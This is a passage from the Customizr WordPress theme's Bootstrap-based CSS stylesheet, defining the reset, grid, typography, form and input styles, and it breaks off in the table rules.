/*! * Customizr v3.2.15 * * Licensed under the GNU General Public License v2 or later * http://www.gnu.org/licenses/gpl-2.0.html * Customized by Nicolas Guillaume (nikeo) and built upon the Twitter Bootstrap Framework (Designed and built with all the love in the world @twitter by @mdo and @fat) */ /***** CONTENT **** => Core variables and mixins => CSS Reset => Grid system and page structure => Base CSS => Components: common => Components: Buttons & Alerts => Components: Nav => Components: Popovers => Components: Misc => Utility classes => Customizer specifics ***** END OF CONTENT *****/ /********************************************************************************* ***************** Core variables and mixins ************************************** **********************************************************************************/ .clearfix { *zoom: 1; } .clearfix:before, .clearfix:after { display: table; content: ""; line-height: 0; } .clearfix:after { clear: both; } .hide-text { font: 0/0 a; color: transparent; text-shadow: none; background-color: transparent; border: 0; } .input-block-level { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } /********************************************************************************* ********************************** CSS Reset************************************** **********************************************************************************/ article, aside, details, figcaption, figure, footer, header, hgroup, nav, section { display: block; } audio, canvas, video { display: inline-block; *display: inline; *zoom: 1; } audio:not([controls]) { display: none; } html { font-size: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } a:focus { outline: thin dotted #333; outline: 5px auto #f3bfdc; outline-offset: -2px; } a:hover, a:active { outline: 0; } sub, sup { position: relative; font-size: 75%; line-height: 0; vertical-align: baseline; } sup { top: -0.5em; } sub { bottom: -0.25em; } img { /* Responsive images (ensure images don't scale beyond their parents) */ max-width: 100%; /* Part 1: Set a maxium relative to the parent */ width: auto\9; /* IE7-8 need help adjusting responsive images */ height: auto; /* Part 2: Scale the height according to the width, otherwise you get stretching */ vertical-align: middle; border: 0; -ms-interpolation-mode: bicubic; } #map_canvas img, .google-maps img { max-width: none; } button, input, select, textarea { margin: 0; font-size: 100%; vertical-align: middle; } button, input { *overflow: visible; line-height: normal; } button::-moz-focus-inner, input::-moz-focus-inner { padding: 0; border: 0; } button, html input[type="button"], input[type="reset"], input[type="submit"] { -webkit-appearance: button; cursor: pointer; } label, select, button, input[type="button"], input[type="reset"], input[type="submit"], input[type="radio"], input[type="checkbox"] { cursor: pointer; } input[type="search"] { -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; -webkit-appearance: textfield; } input[type="search"]::-webkit-search-decoration, input[type="search"]::-webkit-search-cancel-button { -webkit-appearance: none; } textarea { overflow: auto; vertical-align: top; } @media print { * { text-shadow: none !important; color: #000 !important; background: transparent !important; box-shadow: none !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } .ir a:after, a[href^="javascript:"]:after, a[href^="#"]:after { content: ""; } pre, blockquote { border: 1px solid #999; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } @page { margin: 0.5cm; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } } /********************************************************************************* ************************ Grid system and page structure*************************** **********************************************************************************/ body { margin: 0; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; color: #333333; background-color: #ffffff; } a { color: #e67fb9; text-decoration: none; } a:hover, a:focus { color: #da3f96; text-decoration: underline; } .img-rounded { -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .img-polaroid { padding: 4px; background-color: #fff; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, 0.2); -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); -moz-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); } .img-circle { -webkit-border-radius: 500px; -moz-border-radius: 500px; border-radius: 500px; } .row { margin-left: -20px; *zoom: 1; } .row:before, .row:after { display: table; content: ""; line-height: 0; } .row:after { clear: both; } [class*="span"] { float: left; min-height: 1px; margin-left: 20px; } .container, .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 940px; } .span12 { width: 940px; } .span11 { width: 860px; } .span10 { width: 780px; } .span9 { width: 700px; } .span8 { width: 620px; } .span7 { width: 540px; } .span6 { width: 460px; } .span5 { width: 380px; } .span4 { width: 300px; } .span3 { width: 220px; } .span2 { width: 140px; } .span1 { width: 60px; } .offset12 { margin-left: 980px; } .offset11 { margin-left: 900px; } .offset10 { margin-left: 820px; } .offset9 { margin-left: 740px; } .offset8 { margin-left: 660px; } .offset7 { margin-left: 580px; } .offset6 { margin-left: 500px; } .offset5 { margin-left: 420px; } .offset4 { margin-left: 340px; } .offset3 { margin-left: 260px; } .offset2 { margin-left: 180px; } .offset1 { margin-left: 100px; } .row-fluid { width: 100%; *zoom: 1; } .row-fluid:before, .row-fluid:after { display: table; content: ""; line-height: 0; } .row-fluid:after { clear: both; } .row-fluid [class*="span"] { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; float: left; margin-left: 2.12765957%; *margin-left: 2.07446809%; } .row-fluid [class*="span"]:first-child { margin-left: 0; } .row-fluid .controls-row [class*="span"] + [class*="span"] { margin-left: 2.12765957%; } .row-fluid .span12 { width: 100%; *width: 99.94680851%; } .row-fluid .span11 { width: 91.4893617%; *width: 91.43617021%; } .row-fluid .span10 { width: 82.9787234%; *width: 82.92553191%; } .row-fluid .span9 { width: 74.46808511%; *width: 74.41489362%; } .row-fluid .span8 { width: 65.95744681%; *width: 65.90425532%; } .row-fluid .span7 { width: 57.44680851%; *width: 57.39361702%; } .row-fluid .span6 { width: 48.93617021%; *width: 48.88297872%; } .row-fluid .span5 { width: 40.42553191%; *width: 40.37234043%; } .row-fluid .span4 { width: 31.91489362%; *width: 31.86170213%; } .row-fluid .span3 { width: 23.40425532%; *width: 23.35106383%; } .row-fluid .span2 { width: 14.89361702%; *width: 14.84042553%; } .row-fluid .span1 { width: 6.38297872%; *width: 6.32978723%; } .row-fluid .offset12 { margin-left: 104.25531915%; *margin-left: 104.14893617%; } .row-fluid .offset12:first-child { margin-left: 102.12765957%; *margin-left: 102.0212766%; } .row-fluid .offset11 { margin-left: 95.74468085%; *margin-left: 95.63829787%; } .row-fluid .offset11:first-child { margin-left: 93.61702128%; *margin-left: 93.5106383%; } .row-fluid .offset10 { margin-left: 87.23404255%; *margin-left: 87.12765957%; } .row-fluid .offset10:first-child { margin-left: 85.10638298%; *margin-left: 85%; } .row-fluid .offset9 { margin-left: 78.72340426%; *margin-left: 78.61702128%; } .row-fluid .offset9:first-child { margin-left: 76.59574468%; *margin-left: 76.4893617%; } .row-fluid .offset8 { margin-left: 70.21276596%; *margin-left: 70.10638298%; } .row-fluid .offset8:first-child { margin-left: 68.08510638%; *margin-left: 67.9787234%; } .row-fluid .offset7 { margin-left: 61.70212766%; *margin-left: 61.59574468%; } .row-fluid .offset7:first-child { margin-left: 59.57446809%; *margin-left: 59.46808511%; } .row-fluid .offset6 { margin-left: 53.19148936%; *margin-left: 53.08510638%; } .row-fluid .offset6:first-child { margin-left: 51.06382979%; *margin-left: 50.95744681%; } .row-fluid .offset5 { margin-left: 44.68085106%; *margin-left: 44.57446809%; } .row-fluid .offset5:first-child { margin-left: 42.55319149%; *margin-left: 42.44680851%; } .row-fluid .offset4 { margin-left: 36.17021277%; *margin-left: 36.06382979%; } .row-fluid .offset4:first-child { margin-left: 34.04255319%; *margin-left: 33.93617021%; } .row-fluid .offset3 { margin-left: 27.65957447%; *margin-left: 27.55319149%; } .row-fluid .offset3:first-child { margin-left: 25.53191489%; *margin-left: 25.42553191%; } .row-fluid .offset2 { margin-left: 19.14893617%; *margin-left: 19.04255319%; } .row-fluid .offset2:first-child { margin-left: 17.0212766%; *margin-left: 16.91489362%; } .row-fluid .offset1 { margin-left: 10.63829787%; *margin-left: 10.53191489%; } .row-fluid .offset1:first-child { margin-left: 8.5106383%; *margin-left: 8.40425532%; } [class*="span"].hide, .row-fluid [class*="span"].hide { display: none; } [class*="span"].pull-right, .row-fluid [class*="span"].pull-right { float: right; } .container { margin-right: auto; margin-left: auto; *zoom: 1; } .container:before, .container:after { display: table; content: ""; line-height: 0; } .container:after { clear: both; } .container-fluid { padding-right: 20px; padding-left: 20px; *zoom: 1; } .container-fluid:before, .container-fluid:after { display: table; content: ""; line-height: 0; } .container-fluid:after { clear: both; } /********************************************************************************* ******************************** Base CSS **************************************** **********************************************************************************/ p { margin: 0 0 10px; } .lead { margin-bottom: 20px; font-size: 21px; font-weight: 200; line-height: 30px; } small { font-size: 85%; } strong { font-weight: bold; } em { font-style: italic; } cite { font-style: normal; } .muted { color: #999999; } a.muted:hover, a.muted:focus { color: #808080; } .text-warning { color: #c09853; } a.text-warning:hover, a.text-warning:focus { color: #a47e3c; } .text-error { color: #b94a48; } a.text-error:hover, a.text-error:focus { color: #953b39; } .text-info { color: #3a87ad; } a.text-info:hover, a.text-info:focus { color: #2d6987; } .text-success { color: #468847; } a.text-success:hover, a.text-success:focus { color: #356635; } .text-left { text-align: left; } .text-right { text-align: right; } .text-center { text-align: center; } h1, h2, h3, h4, h5, h6 { margin: 10px 0; font-family: inherit; font-weight: bold; line-height: 20px; color: inherit; text-shadow: 0px 1px 0px #ffffff; } h1 small, h2 small, h3 small, h4 small, h5 small, h6 small { font-weight: normal; line-height: 1; color: #999999; } /* tc addons */ h1 { font-size: 38px; line-height: 38px; } h2 { font-size: 32px; line-height: 32px; } h3 { font-size: 24px; line-height: 24px; } h4 { font-size: 18px; line-height: 18px; } h5 { font-size: 14px; line-height: 14px; } h6 { font-size: 12px; line-height: 12px; } /* h1, h2, h3 { line-height: @baseLineHeight * 2; } h1 { font-size: @baseFontSize * 2.75; } // ~38px h2 { font-size: @baseFontSize * 2.25; } // ~32px h3 { font-size: @baseFontSize * 1.75; } // ~24px h4 { font-size: @baseFontSize * 1.25; } // ~18px h5 { font-size: @baseFontSize; } h6 { font-size: @baseFontSize * 0.85; } // ~12px*/ h1 small { font-size: 24.5px; } h2 small { font-size: 17.5px; } h3 small { font-size: 14px; } h4 small { font-size: 14px; } .page-header { padding-bottom: 9px; margin: 20px 0 30px; border-bottom: 1px solid #eeeeee; } ul, ol { padding: 0; margin: 0 0 10px 25px; } ul ul, ul ol, ol ol, ol ul { margin-bottom: 0; } li { line-height: 20px; } ul.unstyled, ol.unstyled { margin-left: 0; list-style: none; } ul.inline, ol.inline { margin-left: 0; list-style: none; } ul.inline > li, ol.inline > li { display: inline-block; *display: inline; /* IE7 inline-block hack */ *zoom: 1; padding-left: 5px; padding-right: 5px; } dl { margin-bottom: 20px; } dt, dd { line-height: 20px; } dt { font-weight: bold; } dd { margin-left: 10px; } .dl-horizontal { *zoom: 1; } .dl-horizontal:before, .dl-horizontal:after { display: table; content: ""; line-height: 0; } .dl-horizontal:after { clear: both; } .dl-horizontal dt { float: left; width: 160px; clear: left; text-align: right; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; } .dl-horizontal dd { margin-left: 180px; } hr { margin: 20px 0; border: 0; border-top: 1px solid #eeeeee; border-bottom: 1px solid #ffffff; } abbr[title], abbr[data-original-title] { cursor: help; border-bottom: 1px dotted #999999; } abbr.initialism { font-size: 90%; text-transform: uppercase; } blockquote { padding: 0 0 0 15px; margin: 0 0 20px; border-left: 5px solid #e67fb9; } blockquote p { margin-bottom: 0; font-size: 17.5px; font-weight: 300; line-height: 1.25; } blockquote small { display: block; line-height: 20px; color: #999999; } blockquote small:before { content: '\2014 \00A0'; } blockquote.pull-right { float: right; padding-right: 15px; padding-left: 0; border-right: 5px solid #eeeeee; border-left: 0; } blockquote.pull-right p, blockquote.pull-right small { text-align: right; } blockquote.pull-right small:before { content: ''; } blockquote.pull-right small:after { content: '\00A0 \2014'; } q:before, q:after, blockquote:before, blockquote:after { content: ""; } address { display: block; margin-bottom: 20px; font-style: normal; line-height: 20px; } code, pre { padding: 0 3px 2px; font-family: Monaco, Menlo, Consolas, "Courier New", monospace; font-size: 12px; color: #333333; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } code { padding: 2px 4px; color: #d14; background-color: #f7f7f9; border: 1px solid #e1e1e8; white-space: nowrap; } pre { display: block; padding: 9.5px; margin: 0 0 10px; font-size: 13px; line-height: 20px; word-break: break-all; word-wrap: break-word; white-space: pre; white-space: pre-wrap; background-color: #f5f5f5; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, 0.15); -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } pre.prettyprint { margin-bottom: 20px; } pre code { padding: 0; color: inherit; white-space: pre; white-space: pre-wrap; background-color: transparent; border: 0; } .pre-scrollable { max-height: 340px; overflow-y: scroll; } form { margin: 0 0 20px; } fieldset { padding: 0; margin: 0; border: 0; } legend { display: block; width: 100%; padding: 0; margin-bottom: 20px; font-size: 21px; line-height: 40px; color: #333333; border: 0; border-bottom: 1px solid #e5e5e5; } legend small { font-size: 15px; color: #999999; } label, input, button, select, textarea { font-size: 14px; font-weight: normal; line-height: 20px; } input, button, select, textarea { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; } label { display: block; margin-bottom: 5px; } select, textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input { display: inline-block; height: 20px; padding: 4px 6px; margin-bottom: 10px; font-size: 14px; line-height: 20px; color: #555555; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; vertical-align: middle; } input, textarea, .uneditable-input { width: 206px; } textarea { height: auto; } textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input { background-color: #ffffff; border: 1px solid #cccccc; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); -webkit-transition: border linear .2s, box-shadow linear .2s; -moz-transition: border linear .2s, box-shadow linear .2s; -o-transition: border linear .2s, box-shadow linear .2s; transition: border linear .2s, box-shadow linear .2s; } textarea:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus, input[type="week"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus, .uneditable-input:focus { border-color: #f3bfdc; outline: 0; outline: thin dotted \9; /* IE6-9 */ -webkit-box-shadow: 0 0 8px #f3bfdc; -moz-box-shadow: 0 0 8px #f3bfdc; box-shadow: 0 0 8px #f3bfdc; } input[type="radio"], input[type="checkbox"] { margin: 4px 0 0; *margin-top: 0; /* IE7 */ margin-top: 1px \9; /* IE8-9 */ line-height: normal; } input[type="file"], input[type="image"], input[type="submit"], input[type="reset"], input[type="button"], input[type="radio"], input[type="checkbox"] { width: auto; } select, input[type="file"] { height: 30px; /* In IE7, the height of the select element cannot be changed by height, only font-size */ *margin-top: 4px; /* For IE7, add top margin to align select with labels */ line-height: 30px; } select { width: 220px; border: 1px solid #cccccc; background-color: #ffffff; } select[multiple], select[size] { height: auto; } select:focus, input[type="file"]:focus, input[type="radio"]:focus, input[type="checkbox"]:focus { outline: thin dotted #333; outline: 5px auto #f3bfdc; outline-offset: -2px; } .uneditable-input, .uneditable-textarea { color: #999999; background-color: #fcfcfc; border-color: #cccccc; -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.025); -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.025); box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.025); cursor: not-allowed; } .uneditable-input { overflow: hidden; white-space: nowrap; } .uneditable-textarea { width: auto; height: auto; } input:-moz-placeholder, textarea:-moz-placeholder { color: #999999; } input:-ms-input-placeholder, textarea:-ms-input-placeholder { color: #999999; } input::-webkit-input-placeholder, textarea::-webkit-input-placeholder { color: #999999; } .radio, .checkbox { min-height: 20px; padding-left: 20px; } .radio input[type="radio"], .checkbox input[type="checkbox"] { float: left; margin-left: -20px; } .controls > .radio:first-child, .controls > .checkbox:first-child { padding-top: 5px; } .radio.inline, .checkbox.inline { display: inline-block; padding-top: 5px; margin-bottom: 0; vertical-align: middle; } .radio.inline + .radio.inline, .checkbox.inline + .checkbox.inline { margin-left: 10px; } .input-mini { width: 60px; } .input-small { width: 90px; } .input-medium { width: 150px; } .input-large { width: 210px; } .input-xlarge { width: 270px; } .input-xxlarge { width: 530px; } input[class*="span"], select[class*="span"], textarea[class*="span"], .uneditable-input[class*="span"], .row-fluid input[class*="span"], .row-fluid select[class*="span"], .row-fluid textarea[class*="span"], .row-fluid .uneditable-input[class*="span"] { float: none; margin-left: 0; } .input-append input[class*="span"], .input-append .uneditable-input[class*="span"], .input-prepend input[class*="span"], .input-prepend .uneditable-input[class*="span"], .row-fluid input[class*="span"], .row-fluid select[class*="span"], .row-fluid textarea[class*="span"], .row-fluid .uneditable-input[class*="span"], .row-fluid .input-prepend [class*="span"], .row-fluid .input-append [class*="span"] { display: inline-block; } input, textarea, .uneditable-input { margin-left: 0; } .controls-row [class*="span"] + [class*="span"] { margin-left: 20px; } input.span12, textarea.span12, .uneditable-input.span12 { width: 926px; } input.span11, textarea.span11, .uneditable-input.span11 { width: 846px; } input.span10, textarea.span10, .uneditable-input.span10 { width: 766px; } input.span9, textarea.span9, .uneditable-input.span9 { width: 686px; } input.span8, textarea.span8, .uneditable-input.span8 { width: 606px; } input.span7, textarea.span7, .uneditable-input.span7 { width: 526px; } input.span6, textarea.span6, .uneditable-input.span6 { width: 446px; } input.span5, textarea.span5, .uneditable-input.span5 { width: 366px; } input.span4, textarea.span4, .uneditable-input.span4 { width: 286px; } input.span3, textarea.span3, .uneditable-input.span3 { width: 206px; } input.span2, textarea.span2, .uneditable-input.span2 { width: 126px; } input.span1, textarea.span1, .uneditable-input.span1 { width: 46px; } .controls-row { *zoom: 1; } .controls-row:before, .controls-row:after { display: table; content: ""; line-height: 0; } .controls-row:after { clear: both; } .controls-row [class*="span"], .row-fluid .controls-row [class*="span"] { float: left; } .controls-row .checkbox[class*="span"], .controls-row .radio[class*="span"] { padding-top: 5px; } input[disabled], select[disabled], textarea[disabled], input[readonly], select[readonly], textarea[readonly] { cursor: not-allowed; background-color: #eeeeee; } input[type="radio"][disabled], input[type="checkbox"][disabled], input[type="radio"][readonly], input[type="checkbox"][readonly] { background-color: transparent; } .control-group.warning .control-label, .control-group.warning .help-block, .control-group.warning .help-inline { color: #c09853; } .control-group.warning .checkbox, .control-group.warning .radio, .control-group.warning input, .control-group.warning select, .control-group.warning textarea { color: #c09853; } .control-group.warning input, .control-group.warning select, .control-group.warning textarea { border-color: #c09853; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); } .control-group.warning input:focus, .control-group.warning select:focus, .control-group.warning textarea:focus { border-color: #a47e3c; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e; -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e; } .control-group.warning .input-prepend .add-on, .control-group.warning .input-append .add-on { color: #c09853; background-color: #fcf8e3; border-color: #c09853; } .control-group.error .control-label, .control-group.error .help-block, .control-group.error .help-inline { color: #b94a48; } .control-group.error .checkbox, .control-group.error .radio, .control-group.error input, .control-group.error select, .control-group.error textarea { color: #b94a48; } .control-group.error input, .control-group.error select, .control-group.error textarea { border-color: #b94a48; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); } .control-group.error input:focus, .control-group.error select:focus, .control-group.error textarea:focus { border-color: #953b39; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392; -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392; } .control-group.error .input-prepend .add-on, .control-group.error .input-append .add-on { color: #b94a48; background-color: #f2dede; border-color: #b94a48; } .control-group.success .control-label, .control-group.success .help-block, .control-group.success .help-inline { color: #468847; } .control-group.success .checkbox, .control-group.success .radio, .control-group.success input, .control-group.success select, .control-group.success textarea { color: #468847; } .control-group.success input, .control-group.success select, .control-group.success textarea { border-color: #468847; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); } .control-group.success input:focus, .control-group.success select:focus, .control-group.success textarea:focus { border-color: #356635; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b; -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b; } .control-group.success .input-prepend .add-on, .control-group.success .input-append .add-on { color: #468847; background-color: #dff0d8; border-color: #468847; } .control-group.info .control-label, .control-group.info .help-block, .control-group.info .help-inline { color: #3a87ad; } .control-group.info .checkbox, .control-group.info .radio, .control-group.info input, .control-group.info select, .control-group.info textarea { color: #3a87ad; } .control-group.info input, .control-group.info select, .control-group.info textarea { border-color: #3a87ad; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); } .control-group.info input:focus, .control-group.info select:focus, .control-group.info textarea:focus { border-color: #2d6987; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7ab5d3; -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7ab5d3; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7ab5d3; } .control-group.info .input-prepend .add-on, .control-group.info .input-append .add-on { color: #3a87ad; background-color: #d9edf7; border-color: #3a87ad; } input:focus:invalid, textarea:focus:invalid, select:focus:invalid { color: #b94a48; border-color: #ee5f5b; } input:focus:invalid:focus, textarea:focus:invalid:focus, select:focus:invalid:focus { border-color: #e9322d; -webkit-box-shadow: 0 0 6px #f8b9b7; -moz-box-shadow: 0 0 6px #f8b9b7; box-shadow: 0 0 6px #f8b9b7; } .form-actions { padding: 19px 20px 20px; margin-top: 20px; margin-bottom: 20px; background-color: #f5f5f5; border-top: 1px solid #e5e5e5; *zoom: 1; } .form-actions:before, .form-actions:after { display: table; content: ""; line-height: 0; } .form-actions:after { clear: both; } .help-block, .help-inline { color: #595959; } .help-block { display: block; margin-bottom: 10px; } .help-inline { display: inline-block; *display: inline; /* IE7 inline-block hack */ *zoom: 1; vertical-align: middle; padding-left: 5px; } .input-append, .input-prepend { display: inline-block; margin-bottom: 10px; vertical-align: middle; font-size: 0; white-space: nowrap; } .input-append input, .input-prepend input, .input-append select, .input-prepend select, .input-append .uneditable-input, .input-prepend .uneditable-input, .input-append .dropdown-menu, .input-prepend .dropdown-menu, .input-append .popover, .input-prepend .popover { font-size: 14px; } .input-append input, .input-prepend input, .input-append select, .input-prepend select, .input-append .uneditable-input, .input-prepend .uneditable-input { position: relative; margin-bottom: 0; *margin-left: 0; vertical-align: top; -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; } .input-append input:focus, .input-prepend input:focus, .input-append select:focus, .input-prepend select:focus, .input-append .uneditable-input:focus, .input-prepend .uneditable-input:focus { z-index: 2; } .input-append .add-on, .input-prepend .add-on { display: inline-block; width: auto; height: 20px; min-width: 16px; padding: 4px 5px; font-size: 14px; font-weight: normal; line-height: 20px; text-align: center; text-shadow: 0 1px 0 #ffffff; background-color: #eeeeee; border: 1px solid #ccc; } .input-append .add-on, .input-prepend .add-on, .input-append .btn, .input-prepend .btn, .input-append .btn-group > .dropdown-toggle, .input-prepend .btn-group > .dropdown-toggle { vertical-align: top; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .input-append .active, .input-prepend .active { background-color: #a9dba9; border-color: #46a546; } .input-prepend .add-on, .input-prepend .btn { margin-right: -1px; } .input-prepend .add-on:first-child, .input-prepend .btn:first-child { -webkit-border-radius: 4px 0 0 4px; -moz-border-radius: 4px 0 0 4px; border-radius: 4px 0 0 4px; } .input-append input, .input-append select, .input-append .uneditable-input { -webkit-border-radius: 4px 0 0 4px; -moz-border-radius: 4px 0 0 4px; border-radius: 4px 0 0 4px; } .input-append input + .btn-group .btn:last-child, .input-append select + .btn-group .btn:last-child, .input-append .uneditable-input + .btn-group .btn:last-child { -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; } .input-append .add-on, .input-append .btn, .input-append .btn-group { margin-left: -1px; } .input-append .add-on:last-child, .input-append .btn:last-child, .input-append .btn-group:last-child > .dropdown-toggle { -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; } .input-prepend.input-append input, .input-prepend.input-append select, .input-prepend.input-append .uneditable-input { -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .input-prepend.input-append input + .btn-group .btn, .input-prepend.input-append select + .btn-group .btn, .input-prepend.input-append .uneditable-input + .btn-group .btn { -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; } .input-prepend.input-append .add-on:first-child, .input-prepend.input-append .btn:first-child { margin-right: -1px; -webkit-border-radius: 4px 0 0 4px; -moz-border-radius: 4px 0 0 4px; border-radius: 4px 0 0 4px; } .input-prepend.input-append .add-on:last-child, .input-prepend.input-append .btn:last-child { margin-left: -1px; -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; } .input-prepend.input-append .btn-group:first-child { margin-left: 0; } input.search-query { padding-right: 14px; padding-right: 4px \9; padding-left: 14px; padding-left: 4px \9; /* IE7-8 doesn't have border-radius, so don't indent the padding */ margin-bottom: 0; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; } /* Allow for input prepend/append in search forms */ .form-search .input-append .search-query, .form-search .input-prepend .search-query { -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .form-search .input-append .search-query { -webkit-border-radius: 14px 0 0 14px; -moz-border-radius: 14px 0 0 14px; border-radius: 14px 0 0 14px; } .form-search .input-append .btn { -webkit-border-radius: 0 14px 14px 0; -moz-border-radius: 0 14px 14px 0; border-radius: 0 14px 14px 0; } .form-search .input-prepend .search-query { -webkit-border-radius: 0 14px 14px 0; -moz-border-radius: 0 14px 14px 0; border-radius: 0 14px 14px 0; } .form-search .input-prepend .btn { -webkit-border-radius: 14px 0 0 14px; -moz-border-radius: 14px 0 0 14px; border-radius: 14px 0 0 14px; } .form-search input, .form-inline input, .form-horizontal input, .form-search textarea, .form-inline textarea, .form-horizontal textarea, .form-search select, .form-inline select, .form-horizontal select, .form-search .help-inline, .form-inline .help-inline, .form-horizontal .help-inline, .form-search .uneditable-input, .form-inline .uneditable-input, .form-horizontal .uneditable-input, .form-search .input-prepend, .form-inline .input-prepend, .form-horizontal .input-prepend, .form-search .input-append, .form-inline .input-append, .form-horizontal .input-append { display: inline-block; *display: inline; /* IE7 inline-block hack */ *zoom: 1; margin-bottom: 0; vertical-align: middle; } .form-search .hide, .form-inline .hide, .form-horizontal .hide { display: none; } .form-search label, .form-inline label, .form-search .btn-group, .form-inline .btn-group { display: inline-block; } .form-search .input-append, .form-inline .input-append, .form-search .input-prepend, .form-inline .input-prepend { margin-bottom: 0; } .form-search .radio, .form-search .checkbox, .form-inline .radio, .form-inline .checkbox { padding-left: 0; margin-bottom: 0; vertical-align: middle; } .form-search .radio input[type="radio"], .form-search .checkbox input[type="checkbox"], .form-inline .radio input[type="radio"], .form-inline .checkbox input[type="checkbox"] { float: left; margin-right: 3px; margin-left: 0; } .control-group { margin-bottom: 10px; } legend + .control-group { margin-top: 20px; -webkit-margin-top-collapse: separate; } .form-horizontal .control-group { margin-bottom: 20px; *zoom: 1; } .form-horizontal .control-group:before, .form-horizontal .control-group:after { display: table; content: ""; line-height: 0; } .form-horizontal .control-group:after { clear: both; } .form-horizontal .control-label { float: left; width: 160px; padding-top: 5px; text-align: right; } .form-horizontal .controls { *display: inline-block; *padding-left: 20px; margin-left: 180px; *margin-left: 0; } .form-horizontal .controls:first-child { *padding-left: 180px; } .form-horizontal .help-block { margin-bottom: 0; } .form-horizontal input + .help-block, .form-horizontal select + .help-block, .form-horizontal textarea + .help-block, .form-horizontal .uneditable-input + .help-block, .form-horizontal .input-prepend + .help-block, .form-horizontal .input-append + .help-block { margin-top: 10px; } .form-horizontal .form-actions { padding-left: 180px; } table { max-width: 100%; background-color: transparent; border-collapse: collapse; border-spacing: 0; } .table { width: 100%; margin-bottom: 20px; } .table th, .table td { padding: 8px; line-height: 20px; text-align: left; vertical-align: top; border-top: 